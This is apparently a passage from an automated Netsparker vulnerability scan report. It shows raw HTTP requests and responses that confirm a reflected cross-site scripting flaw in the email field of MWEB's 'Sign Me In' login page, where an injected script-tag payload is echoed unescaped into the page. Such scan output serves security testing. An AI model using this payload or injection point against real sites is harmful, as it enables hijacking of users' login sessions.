var oTag = oArea + ";sz=" + oSize + ";" + "tile=" + oTile + ";posno=" + oPos + ";ord=" + randomnumber + "?";
//document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"><\/script>');
document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"></script>');
}
-->
</script>
<body>
<div class="alignContainer">
<div class="mainContainer">
<div class="masthead"><a href="http://www.mweb.co.za"><img src="/images/mweb/ma_mweb_logo.gif" /></a><img src="/images/mweb/ma_masthead.jpg" /></div>
<div class="bodyContainer">
<div class="cnrs"><img src="/images/mweb/ma_top_cnrs.gif" /></div>
<div class="leftCol"><img src="/images/mweb/ma_head_importantnotice.gif" width="392" height="62" />
<div class="ma_txt">Always keep your password safe from prying eyes. Do not share it with anyone. If your password is compromised, people will be able to abuse your account and use your Internet connection. We advise that you change your password on a regular basis. </div>
<div class="ma_txt"></div>
<img src="/images/mweb/ma_head_signin.gif" />
<div class="ma_txt">
<ul>
<li>Access My Account to monitor your data consumption, view billing information and much more</li>
<li>Access MWEB Message Centre to send and receive e-mails, faxes and manage your contacts</li>
<li>Get all the news, lifestyle and entertainment info that you want, customised to your needs with My MWEB</li>
<li>Access MWEB Mobile to send SMS's and Batch SMS's </li>
</ul>
</div>
</div>
<div class="rightCol">
<div class="smi_block">
<div class="containerWidth">
<!-- CONTAINER (SETS COLOR + PADDING) -->
<div class="containerStyles">
<div>
<div class="logo">
<span id="lblSMIText" style="color:White;font-family:arial;font-size:17pt;"><strong><span class='signInText'>Sign</span></strong> Me In</span>
</div>
<div class="whatIsThis">
<span class="textLinkWhite">
<span id="m_whatIsThisLabel">
<a href="whats_this.aspx">What is this</a></span>
</span>
<span>
<span id="lblQuestionMark" style="color:White;font-family:arial;font-size:16pt;"><strong>?</strong></span>
</span>
</div>
</div>
<div class="clearAndLine">
<!-- <img height="1" width="1" > -->
</div>
<div class="greyLine">
<!-- <img height="1" width="1" > -->
</div>
<span id="m_topTextLabel"><div class="topText">Never signed in before? <span class="textLinkBlack"><a href="registration.aspx?">Click here to register.</a></span></div></span>
<!-- VALIDATION -->
<div class="topText">
<div><b><span id="m_systemMessage"></span></b></div><div id="ValidationSummaryMain" class="errorText" style="display:none;">
</div><span id="m_notificationText" class="errorText" style="font-color: red">Invalid email address: '"--></style></script><script>netsparker(0x000ce9)</script></span></div>
<!-- FORM -->
<div class="contentContainer">
<table cellSpacing="0" cellPadding="0" border="0">
<!-- email address -->
<tr><td style="WIDTH: 125px"><b><span id="m_emailLabel">E-mail Address</span></b><span style="FONT-SIZE: 10px"> »</span></td><td align="right"><span class="inputShadow"><input name="m_emailAddress" type="text" id="m_emailAddress" style="WIDTH: 155px" value="'"--></style></script><script>netsparker(0x000CE9)</script>" /></span><span id="RequiredFieldValidatorEmail" style="color:Red;display:none;"></span></td></tr>
<!-- password -->
<tr><td class="passwordField"><b><span id="m_passwordLabel">Password</span></b><span style="FONT-SIZE: 10px"> »</span></td><td class="passwordField" align="right"><span class="inputShadow"><input name="m_password" type="password" id="m_password" style="WIDTH: 155px" maxlength="16" /></span><span id="RequiredFieldValidatorPassword" style="color:Red;display:none;"></span></td></tr>
<!-- remember me -->
<span id="m_rememberMeLabel"><tr><td> </td><td class="rememberMe"><INPUT id="m_rememberMe" type="checkbox" name="m_rememberMe" value="true" style="border:0px"/>Remember me</td></tr></span>
<!-- reauth: if you are not... -->
<span id="m_reauthSection"></span>
</table></div>
<!-- BUTTONS -->
<div class="buttonSection" align="center">
<input onclick="if (typeof(Page_ClientValidate) == 'function') Page_ClientValidate(''); " name="m_submitButton" type="submit" id="m_submitButton" class="buttOrange" value="SIGN IN" />
<input name="m_failedCount" type="hidden" id="m_failedCount" value="3" />
<input name="m_authType" type="hidden" id="m_authType" value="3" /></div>
<!-- BOTTOM LINKS -->
<span id="m_bottomSectionLabel"><div class="bottomSection" align="center"><span class="textLinkWhite"><a href="reset_password.aspx?">Forgotten Password?</a></span></div></span></div>
<div class="otherLogin">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
<tr>
<td style="padding-bottom: 10px">
</td>
</tr>
</table>
</div>
<DIV>
<!-- SAFARI DETECT AND WARNING MESSAGE -->
<div id="safari_warning" class="warning_block" style="background-image:url(images/warning_block.jpg); background-repeat:no-repeat;">
<table cellpadding="0" cellspacing="0" class="tblSafariWarning" >
<tr>
<td>
<div class="safariWarningHearder">Safari browser users</div>
<ol>
<li>Accept all cookies</li>
<li>Enable Javascript</li>
<li>Disable pop up blocker</li>
</ol>
<div class="safariWarningLink">
For step by step guide on how to make these changes vist the <a href="http://www.mweb.co.za/helpcentre/SafariHelpGuide/tabid/1986/Default.aspx">MWEB Help Centre.</a>
</div>
</td>
</tr>
</table>
</div>
<!-- END SIGNMEIN BLOCK -->
<script type="text/javascript">
<!--
if((BrowserDetect.browser != "Safari"))
{
document.getElementById("safari_warning").style.display = "none";
}
//-->
</script>
</DIV>
<!--TEMPLATE-BOTTOM--><!--SMI--></div>
<div class="ad_block" >
<script language="javascript">
fncMakeBlockAd('https://ad.uk.doubleclick.net/adj/P4306.sa.24.com.mweb/SMI','300x250','1',null,3);
</script>
</div>
</div>
</div>
</div>
<div class="cnrs"><img src="/images/mweb/ma_bot_cnr.png" /></div>
<!-- Footer Starts -->
<div class="footerPos">
<span class="navybold">
<br />
<br />
© 1998 - <script type="text/javascript">CurrentYear()</script> MWEB | All rights reserved.
</span><br />
<a href="http://www.mweb.co.za/legalpolicies/tabid/1614/Default.aspx">Website Terms of Use</a> | <a href="http://www.mweb.co.za/legalpolicies/">Legal Notices</a> | <a href="http://www.mweb.co.za/productsservices/JoinUpgrade/tabid/96/Default.aspx">Join MWEB</a> |
<a href="http://www.mweb.com/">About Us</a> | <a href="http://www.mweb.co.za/helpcentre/ContactUs/tabid/390/Default.aspx">Contact Us</a><br /><a href="http://sales.24.com/ChannelInfo.aspx?channel_id=26">Advertise on MWEB </a> | <a href="http://www.mwebbusiness.co.za/Default.aspx">Get Your Business Online</a> | <a href="http://www.mweb.co.za/securitycentre/">Security Services</a> | <a href="http://www.mweb.co.za/helpcentre/">Help</a>
<p> </p>
</div>
<!-- end -->
</div>
</body>
<!-- FOCUS SCRIPT --><script language="javascript">function do_focus() {}</script>
</div>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationSummaries = new Array(document.getElementById("ValidationSummaryMain"));
var Page_Validators = new Array(document.getElementById("RequiredFieldValidatorEmail"), document.getElementById("RequiredFieldValidatorPassword"));
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var ValidationSummaryMain = document.all ? document.all["ValidationSummaryMain"] : document.getElementById("ValidationSummaryMain");
ValidationSummaryMain.headertext = "Errors in form information";
var RequiredFieldValidatorEmail = document.all ? document.all["RequiredFieldValidatorEmail"] : document.getElementById("RequiredFieldValidato..
Date: Mon, 21 Mar 2011 17:21:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR PSAa PSDa OUR IND UNI",CP=""NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE STA PUR INT NAV""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache,no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17574
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD id="HEAD1"><title>
:: Sign Me In ::
</title><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" /><meta content="C#" name="CODE_LANGUAGE" /><meta content="JavaScript" name="vs_defaultClientScript" /><meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema" /><link id="styleRel" href="styles/smi2.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="scripts/scripts.js"></script>
<script language="javascript">
function do_registration() {
window.location.href = ''
}
function setEmailFocus()
{
document.getElementById("m_emailAddress").focus();
}
</script>
</HEAD>
<body onload="javascript : do_focus();">
<form name="form1" method="post" action="authentication.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTgwMTMwMzhkZHWmTRgiVO+MJYlgiy6PMKVGAQqc" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=YVtZL4c1IiPwvADNkEpMHWGtLtBjGPDpIvfH1INmPvMob3jKoQIk0KdQZPyz9E_XHnS0q-3QW2a7X4--hXVPEbc2NV81&t=634214538859809629" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBgKp78XzAgL71YatCgKVg63aCAKyn+FkAp7Vg+EEArqY7psI8A+qtvcn+NThUQn3khS6hPha0NU=" />
</div>
<!--TEMPLATE-TOP--><style type="text/css">
<!--
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
background-color: #d7dfe6;
background-image: url(/images/mweb/ma_bg_tile.jpg);
background-repeat: repeat-x;
background-position: top;
text-align: center;
}
img {
border:none;
}
a {
color:#212121;
/*font-weight:bold; */
text-decoration:none;
}
a:hover {
color:#00527d;
text-decoration:underline;
}
.alignContainer {
width:750px;
margin:auto;
}
.mainContainer {
width:750px;
float:left;
text-align:left;
}
.masthead {
width:750px;
float:left;
}
.bodyContainer {
width:750px;
float:left;
text-align:left;
background-color:white;
}
.cnrs {
float:left;
}
.leftCol {
width:395px;
float:left;
margin-left:15px;
display:inline;
}
.rightCol {
width:330px;
float:left;
}
/*bullet list*/
ul li {
background:url(/images/mweb/ma_org_bullet.gif) no-repeat 0 7px;
padding-left:20px;
margin-left:-30px;
list-style:none;
line-height:25px;
}
.ma_txt {
width:380px;
float:left;
margin-left:10px;
display:inline;
line-height:16px;
}
.ma_rcol_block {
width:309px;
height:255px;
float:left;
background-image:url(/images/mweb/ma_box_bg.gif);
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ad_block{
width:309px;
height:255px;
float:left;
/*background-image:url(/images/mweb/ma_box_bg.gif);*/
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ma_rcol_block img {
margin-top:20px;
display:inline;
}
/*smi style for green block*/
.smi_block{
width:300px;
float:left;
margin-left:10px;
display:inline;
}
.pixie_gem
{
width:100%;
float:left;
padding-top:10px;
padding-left:8px;
/*margin-left:10px;*/
display:inline;
background-color:#D8ECF5;
}
/*Footer */
.footerPos
{
text-align:center;
}
.navybold
{
font-weight: 700;
color: #002e6c;
margin-top: 10px;
}
-->
</style>
<!-- Get Date -->
<script type="text/javascript">
<!--
function CurrentYear()
{
var date = new Date();
var year = date.getFullYear();
document.write(year);
}
var randomnumber = Math.floor(Math.random() * 1111111111111111);
function fncMakeBlockAd(oArea, oSize, oPos, oOrd, oTile) {
var oTag = oArea + ";sz=" + oSize + ";" + "tile=" + oTile + ";posno=" + oPos + ";ord=" + randomnumber + "?";
//document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"><\/script>');
document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"></script>');
}
-->
</script>
<body>
<div class="alignContainer">
<div class="mainContainer">
<div class="masthead"><a href="http://www.mweb.co.za"><img src="/images/mweb/ma_mweb_logo.gif" /></a><img src="/images/mweb/ma_masthead.jpg" /></div>
<div class="bodyContainer">
<div class="cnrs"><img src="/images/mweb/ma_top_cnrs.gif" /></div>
<div class="leftCol"><img src="/images/mweb/ma_head_importantnotice.gif" width="392" height="62" />
<div class="ma_txt">Always keep your password safe from prying eyes. Do not share it with anyone. If your password is compromised, people will be able to abuse your account and use your Internet connection. We advise that you change your password on a regular basis. </div>
<div class="ma_txt"></div>
<img src="/images/mweb/ma_head_signin.gif" />
<div class="ma_txt">
<ul>
<li>Access My Account to monitor your data consumption, view billing information and much more</li>
<li>Access MWEB Message Centre to send and receive e-mails, faxes and manage your contacts</li>
<li>Get all the news, lifestyle and entertainment info that you want, customised to your needs with My MWEB</li>
<li>Access MWEB Mobile to send SMS's and Batch SMS's </li>
</ul>
</div>
</div>
<div class="rightCol">
<div class="smi_block">
<div class="containerWidth">
<!-- CONTAINER (SETS COLOR + PADDING) -->
<div class="containerStyles">
<div>
<div class="logo">
<span id="lblSMIText" style="color:White;font-family:arial;font-size:17pt;"><strong><span class='signInText'>Sign</span></strong> Me In</span>
</div>
<div class="whatIsThis">
<span class="textLinkWhite">
<span id="m_whatIsThisLabel">
<a href="whats_this.aspx">What is this</a></span>
</span>
<span>
<span id="lblQuestionMark" style="color:White;font-family:arial;font-size:16pt;"><strong>?</strong></span>
</span>
</div>
</div>
<div class="clearAndLine">
<!-- <img height="1" width="1" > -->
</div>
<div class="greyLine">
<!-- <img height="1" width="1" > -->
</div>
<span id="m_topTextLabel"><div class="topText">Never signed in before? <span class="textLinkBlack"><a href="registration.aspx?">Click here to register.</a></span></div></span>
<!-- VALIDATION -->
<div class="topText">
<div><b><span id="m_systemMessage"></span></b></div><div id="ValidationSummaryMain" class="errorText" style="display:none;">
</div><span id="m_notificationText" class="errorText" style="font-color: red">Invalid email address: '"--></style></script><script>netsparker(0x000ce9)</script></span></div>
<!-- FORM -->
<div class="contentContainer">
<table cellSpacing="0" cellPadding="0" border="0">
<!-- email address -->
<tr><td style="WIDTH: 125px"><b><span id="m_emailLabel">E-mail Address</span></b><span style="FONT-SIZE: 10px"> »</span></td><td align="right"><span class="inputShadow"><input name="m_emailAddress" type="text" id="m_emailAddress" style="WIDTH: 155px" value="'"--></style></script><script>netsparker(0x000CE9)</script>" /></span><span id="RequiredFieldValidatorEmail" style="color:Red;display:none;"></span></td></tr>
<!-- password -->
<tr><td class="passwordField"><b><span id="m_passwordLabel">Password</span></b><span style="FONT-SIZE: 10px"> »</span></td><td class="passwordField" align="right"><span class="inputShadow"><input name="m_password" type="password" id="m_password" style="WIDTH: 155px" maxlength="16" /></span><span id="RequiredFieldValidatorPassword" style="color:Red;display:none;"></span></td></tr>
<!-- remember me -->
<span id="m_rememberMeLabel"><tr><td> </td><td class="rememberMe"><INPUT id="m_rememberMe" type="checkbox" name="m_rememberMe" value="true" style="border:0px"/>Remember me</td></tr></span>
<!-- reauth: if you are not... -->
<span id="m_reauthSection"></span>
</table></div>
<!-- BUTTONS -->
<div class="buttonSection" align="center">
<input onclick="if (typeof(Page_ClientValidate) == 'function') Page_ClientValidate(''); " name="m_submitButton" type="submit" id="m_submitButton" class="buttOrange" value="SIGN IN" />
<input name="m_failedCount" type="hidden" id="m_failedCount" value="3" />
<input name="m_authType" type="hidden" id="m_authType" value="3" /></div>
<!-- BOTTOM LINKS -->
<span id="m_bottomSectionLabel"><div class="bottomSection" align="center"><span class="textLinkWhite"><a href="reset_password.aspx?">Forgotten Password?</a></span></div></span></div>
<div class="otherLogin">
<table cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
<tr>
<td style="padding-bottom: 10px">
</td>
</tr>
</table>
</div>
<DIV>
<!-- SAFARI DETECT AND WARNING MESSAGE -->
<div id="safari_warning" class="warning_block" style="background-image:url(images/warning_block.jpg); background-repeat:no-repeat;">
<table cellpadding="0" cellspacing="0" class="tblSafariWarning" >
<tr>
<td>
<div class="safariWarningHearder">Safari browser users</div>
<ol>
<li>Accept all cookies</li>
<li>Enable Javascript</li>
<li>Disable pop up blocker</li>
</ol>
<div class="safariWarningLink">
For step by step guide on how to make these changes vist the <a href="http://www.mweb.co.za/helpcentre/SafariHelpGuide/tabid/1986/Default.aspx">MWEB Help Centre.</a>
</div>
</td>
</tr>
</table>
</div>
<!-- END SIGNMEIN BLOCK -->
<script type="text/javascript">
<!--
if((BrowserDetect.browser != "Safari"))
{
document.getElementById("safari_warning").style.display = "none";
}
//-->
</script>
</DIV>
<!--TEMPLATE-BOTTOM--><!--SMI--></div>
<div class="ad_block" >
<script language="javascript">
fncMakeBlockAd('https://ad.uk.doubleclick.net/adj/P4306.sa.24.com.mweb/SMI','300x250','1',null,3);
</script>
</div>
</div>
</div>
</div>
<div class="cnrs"><img src="/images/mweb/ma_bot_cnr.png" /></div>
<!-- Footer Starts -->
<div class="footerPos">
<span class="navybold">
<br />
<br />
© 1998 - <script type="text/javascript">CurrentYear()</script> MWEB | All rights reserved.
</span><br />
<a href="http://www.mweb.co.za/legalpolicies/tabid/1614/Default.aspx">Website Terms of Use</a> | <a href="http://www.mweb.co.za/legalpolicies/">Legal Notices</a> | <a href="http://www.mweb.co.za/productsservices/JoinUpgrade/tabid/96/Default.aspx">Join MWEB</a> |
<a href="http://www.mweb.com/">About Us</a> | <a href="http://www.mweb.co.za/helpcentre/ContactUs/tabid/390/Default.aspx">Contact Us</a><br /><a href="http://sales.24.com/ChannelInfo.aspx?channel_id=26">Advertise on MWEB </a> | <a href="http://www.mwebbusiness.co.za/Default.aspx">Get Your Business Online</a> | <a href="http://www.mweb.co.za/securitycentre/">Security Services</a> | <a href="http://www.mweb.co.za/helpcentre/">Help</a>
<p> </p>
</div>
<!-- end -->
</div>
</body>
<!-- FOCUS SCRIPT --><script language="javascript">function do_focus() {}</script>
</div>
<script type="text/javascript">
//<![CDATA[
var Page_ValidationSummaries = new Array(document.getElementById("ValidationSummaryMain"));
var Page_Validators = new Array(document.getElementById("RequiredFieldValidatorEmail"), document.getElementById("RequiredFieldValidatorPassword"));
//]]>
</script>
<script type="text/javascript">
//<![CDATA[
var ValidationSummaryMain = document.all ? document.all["ValidationSummaryMain"] : document.getElementById("ValidationSummaryMain");
ValidationSummaryMain.headertext = "Errors in form information";
var RequiredFieldValidatorEmail = document.all ? document.all["RequiredFieldValidatorEmail"] : document.getElementById("RequiredFieldValidato..
|
- /authentication.aspx
/authentication.aspx CONFIRMED |
Parameters
| Parameter | Type | Value |
| m_authType | GET | 3 |
| m_emailAddress | GET | netsparker@example.com |
| m_failedCount | GET | 3 |
| m_password | GET | 3 |
| m_rememberMe | GET | true |
| m_submitButton | GET | SIGN IN |
| __EVENTTARGET | POST | 3 |
| __EVENTARGUMENT | POST | 3 |
| __VIEWSTATE | POST | /wEPDwUIOTgwMTMwMzhkZHWmTRgiVO MJYlgiy6PMKVGAQqc |
| __EVENTVALIDATION | POST | /wEWBgKp78XzAgL71YatCgKVg63aCAKyn FkAp7Vg EEArqY7psI8A qtvcn NThUQn3khS6hPha0NU= |
| m_emailAddress | POST | '"--></style></script><script>alert(0x000F77)</script> |
| m_password | POST | 3 |
| m_rememberMe | POST | true |
| m_submitButton | POST | SIGN IN |
| m_failedCount | POST | 3 |
| m_authType | POST | 3 |
Request
POST /authentication.aspx?m_authType=3&m_emailAddress=netsparker@example.com&m_failedCount=3&m_password=3&m_rememberMe=true&m_submitButton=SIGN+IN HTTP/1.1
Referer: http://www.signmein.co.za/authentication.aspx?__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWBgKp78XzAgL71YatCgKVg63aCAKyn%2bFkAp7Vg%2bEEArqY7psI8A%2bqtvcn%2bNThUQn3khS6hPha0NU%3d&__VIEWSTATE=%2fwEPDwUIOTgwMTMwMzhkZHWmTRgiVO%2bMJYlgiy6PMKVGAQqc&m_authType=&m_emailAddress=&m_failedCount=&m_password=&m_rememberMe=true&m_submitButton=SIGN+IN
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.signmein.co.za
Content-Length: 393
Accept-Encoding: gzip, deflate
__EVENTTARGET=3&__EVENTARGUMENT=3&__VIEWSTATE=%2fwEPDwUIOTgwMTMwMzhkZHWmTRgiVO%2bMJYlgiy6PMKVGAQqc&__EVENTVALIDATION=%2fwEWBgKp78XzAgL71YatCgKVg63aCAKyn%2bFkAp7Vg%2bEEArqY7psI8A%2bqtvcn%2bNThUQn3khS6hPha0NU%3d&m_emailAddress='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000F77)%3c%2fscript%3e&m_password=3&m_rememberMe=true&m_submitButton=SIGN+IN&m_failedCount=3&m_authType=3
Referer: http://www.signmein.co.za/authentication.aspx?__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEWBgKp78XzAgL71YatCgKVg63aCAKyn%2bFkAp7Vg%2bEEArqY7psI8A%2bqtvcn%2bNThUQn3khS6hPha0NU%3d&__VIEWSTATE=%2fwEPDwUIOTgwMTMwMzhkZHWmTRgiVO%2bMJYlgiy6PMKVGAQqc&m_authType=&m_emailAddress=&m_failedCount=&m_password=&m_rememberMe=true&m_submitButton=SIGN+IN
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.signmein.co.za
Content-Length: 393
Accept-Encoding: gzip, deflate
__EVENTTARGET=3&__EVENTARGUMENT=3&__VIEWSTATE=%2fwEPDwUIOTgwMTMwMzhkZHWmTRgiVO%2bMJYlgiy6PMKVGAQqc&__EVENTVALIDATION=%2fwEWBgKp78XzAgL71YatCgKVg63aCAKyn%2bFkAp7Vg%2bEEArqY7psI8A%2bqtvcn%2bNThUQn3khS6hPha0NU%3d&m_emailAddress='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000F77)%3c%2fscript%3e&m_password=3&m_rememberMe=true&m_submitButton=SIGN+IN&m_failedCount=3&m_authType=3
Response
HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:22:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ALL DSP COR PSAa PSDa OUR IND UNI",CP=""NOI LAW NID BUS CUSo PSAo PSDo TAIo OUR OTR COM DEM NAV PRE STA PUR INT NAV""
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache,no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17717
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD id="HEAD1"><title>
:: Sign Me In ::
</title><meta content="Microsoft Visual Studio 7.0" name="GENERATOR" /><meta content="C#" name="CODE_LANGUAGE" /><meta content="JavaScript" name="vs_defaultClientScript" /><meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema" /><link id="styleRel" href="styles/smi2.css" type="text/css" rel="STYLESHEET" />
<script language="javascript" src="scripts/scripts.js"></script>
<script language="javascript">
function do_registration() {
window.location.href = ''
}
function setEmailFocus()
{
document.getElementById("m_emailAddress").focus();
}
</script>
</HEAD>
<body onload="javascript : do_focus();">
<form name="form1" method="post" action="authentication.aspx?m_authType=3&m_emailAddress=netsparker%40example.com&m_failedCount=3&m_password=3&m_rememberMe=true&m_submitButton=SIGN+IN" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUIOTgwMTMwMzhkZHWmTRgiVO+MJYlgiy6PMKVGAQqc" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=YVtZL4c1IiPwvADNkEpMHWGtLtBjGPDpIvfH1INmPvMob3jKoQIk0KdQZPyz9E_XHnS0q-3QW2a7X4--hXVPEbc2NV81&t=634214538859809629" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>
<div>
<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBgKp78XzAgL71YatCgKVg63aCAKyn+FkAp7Vg+EEArqY7psI8A+qtvcn+NThUQn3khS6hPha0NU=" />
</div>
<!--TEMPLATE-TOP--><style type="text/css">
<!--
body {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 11px;
background-color: #d7dfe6;
background-image: url(/images/mweb/ma_bg_tile.jpg);
background-repeat: repeat-x;
background-position: top;
text-align: center;
}
img {
border:none;
}
a {
color:#212121;
/*font-weight:bold; */
text-decoration:none;
}
a:hover {
color:#00527d;
text-decoration:underline;
}
.alignContainer {
width:750px;
margin:auto;
}
.mainContainer {
width:750px;
float:left;
text-align:left;
}
.masthead {
width:750px;
float:left;
}
.bodyContainer {
width:750px;
float:left;
text-align:left;
background-color:white;
}
.cnrs {
float:left;
}
.leftCol {
width:395px;
float:left;
margin-left:15px;
display:inline;
}
.rightCol {
width:330px;
float:left;
}
/*bullet list*/
ul li {
background:url(/images/mweb/ma_org_bullet.gif) no-repeat 0 7px;
padding-left:20px;
margin-left:-30px;
list-style:none;
line-height:25px;
}
.ma_txt {
width:380px;
float:left;
margin-left:10px;
display:inline;
line-height:16px;
}
.ma_rcol_block {
width:309px;
height:255px;
float:left;
background-image:url(/images/mweb/ma_box_bg.gif);
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ad_block{
width:309px;
height:255px;
float:left;
/*background-image:url(/images/mweb/ma_box_bg.gif);*/
background-repeat:no-repeat;
text-align:center;
margin-top:15px;
}
.ma_rcol_block img {
margin-top:20px;
display:inline;
}
/*smi style for green block*/
.smi_block{
width:300px;
float:left;
margin-left:10px;
display:inline;
}
.pixie_gem
{
width:100%;
float:left;
padding-top:10px;
padding-left:8px;
/*margin-left:10px;*/
display:inline;
background-color:#D8ECF5;
}
/*Footer */
.footerPos
{
text-align:center;
}
.navybold
{
font-weight: 700;
color: #002e6c;
margin-top: 10px;
}
-->
</style>
<!-- Get Date -->
<script type="text/javascript">
<!--
function CurrentYear()
{
var date = new Date();
var year = date.getFullYear();
document.write(year);
}
var randomnumber = Math.floor(Math.random() * 1111111111111111);
function fncMakeBlockAd(oArea, oSize, oPos, oOrd, oTile) {
var oTag = oArea + ";sz=" + oSize + ";" + "tile=" + oTile + ";posno=" + oPos + ";ord=" + randomnumber + "?";
//document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"><\/script>');
document.write('<script type="text\/javascript" language="JavaScript" src="' + oTag + '"></script>');
}
-->
</script>
<body>
<div class="alignContainer">
<div class="mainContainer">
<div class="masthead"><a href="http://www.mweb.co.za"><img src="/images/mweb/ma_mweb_logo.gif" /></a><img src="/images/mweb/ma_masthead.jpg" /></div>
<div class="bodyContainer">
<div class="cnrs"><img src="/images/mweb/ma_top_cnrs.gif" /></div>
<div class="leftCol"><img src="/images/mweb/ma_head_importantnotice.gif" width="392" height="62" />
<div class="ma_txt">Always keep your password safe from prying eyes. Do not share it with anyone. If your password is compromised, people will be able to abuse your account and use your Internet connection. We advise that you change your password on a regular basis. </div>
<div class="ma_txt"></div>
<img src="/images/mweb/ma_head_signin.gif" />
<div class="ma_txt">
<ul>
<li>Access My Account to monitor your data consumption, view billing information and much more</li>
<li>Access MWEB Message Centre to send and receive e-mails, faxes and manage your contacts</li>
<li>Get all the news, lifestyle and entertainment info that you want, customised to your needs with My MWEB</li>
<li>Access MWEB Mobile to send SMS's and Batch SMS's </li>
</ul>
</div>
</div>
<div class="rightCol">
<div class="smi_block">
<div class="containerWidth">
<!-- CONTAINER (SETS COLOR + PADDING) -->
<div class="containerStyles">
<div>
<div class="logo">
<span id="lblSMIText" style="color:White;font-family:arial;font-size:17pt;"><strong><span class='signInText'>Sign</span></strong> Me In</span>
</div>
<div class="whatIsThis">
<span class="textLinkWhite">
<span id="m_whatIsThisLabel">
<a href="whats_this.aspx">What is this</a></span>
</span>
<span>
<span id="lblQuestionMark" style="color:White;font-family:arial;font-size:16pt;"><strong>?</strong></span>
</span>
</div>
</div>
<div class="clearAndLine">
<!-- <img height="1" width="1" > -->
</div>
<div class="greyLine">
<!-- <img height="1" width="1" > -->
</div>
<span id="m_topTextLabel"><div class="topText">Never signed in before? <span class="textLinkBlack"><a href="registration.aspx?">Click here to register.</a></span></div></span>
<!-- VALIDATION -->
<div class="topText">
<div><b><span id="m_systemMessage"></span></b></div><div id="ValidationSummaryMain" class="errorText" style="display:none;">
</div><span id="m_notificationText" class="errorText" style="font-color: red">Invalid email address: '"--></style></script><script>netsparker(0x000f77)</script></span></div>
<!-- FORM -->
<div class="contentContainer">
<table cellSpacing="0" cellPadding="0" border="0">
<!-- email address -->
<tr><td style="WIDTH: 125px"><b><span id="m_emailLabel">E-mail Address</span></b><span style="FONT-SIZE: 10px"> »</span></td><td align="right"><span class="inputShadow"><input name="m_emailAddress" type="text" id="m_emailAddress" style="WIDTH: 155px" value="'"--></style></script><script>netsparker(0x000F77)</script>" /></span><span id="RequiredFieldValidatorEmail" style="color:Red;display:none;"></span></td></tr>
<!-- password -->
